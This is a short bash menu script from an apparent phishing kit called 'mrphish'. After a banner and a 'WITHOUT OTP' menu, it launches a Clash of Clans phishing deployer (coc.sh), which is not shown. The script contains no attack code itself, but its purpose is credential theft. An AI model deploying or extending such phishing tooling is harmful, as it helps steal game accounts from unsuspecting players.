
clear
echo -e "

                           ____  _  _  ____  ____ 
                          (_  _)( \/ )(  _ \(  __)
                            )(   )  /  ) __/ ) _) 
                           (__) (__/  (__)  (____)"

                     echo

echo -e "\e[96m        |-----------------------------------------------------|"                                                     
echo -e "\e[96m        |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                [\e[92m1\e[96m]==> WITHOUT OTP                   |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                [\e[92m2\e[96m]==> BACK                          |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |----------------------\e[91mVI SIM\e[96m-------------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
sleep 0.5
read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
if [[ $option == 1 || $option == 01 ]]; then
echo
cd $HOME/mrphish/core/deploys/gaming/clashofclans/notp
bash coc.sh
echo
elif [[ $option == 2 || $option == 02 ]]; then                                                                                                 
bash back
elif [[ $option == 0 ]]; then
clear
echo
printf "                     \e[1;96m Have A Good Day ........! \e[0m\n"
echo
sleep 3.0
exit 3
else
printf "                      \e[1;96m [!] Invalid option!\e[0m\n"
sleep 4.0
bash menu.sh
fi
